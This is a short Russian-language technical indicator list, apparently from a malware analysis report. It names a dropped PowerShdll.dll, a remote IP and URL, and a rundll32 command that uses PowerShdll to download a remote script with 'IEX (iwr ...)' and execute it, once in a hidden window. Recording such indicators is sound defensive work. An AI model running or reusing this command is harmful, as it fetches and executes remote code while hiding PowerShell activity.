Техническая информация
- %WINDIR%\tasks\powershdll.dll
- '<SYSTEM32>\rundll32.exe' %WINDIR%\Tasks\PowerShdll.dll,main . IEX (iwr -useb http://54.81.73.219/encoded.txt)
- '54.##.73.219':80
- http://54.##.73.219/PowerShdll.dll
- '<SYSTEM32>\rundll32.exe' %WINDIR%\Tasks\PowerShdll.dll,main . IEX (iwr -useb http://54.81.73.219/encoded.txt)' (со скрытым окном)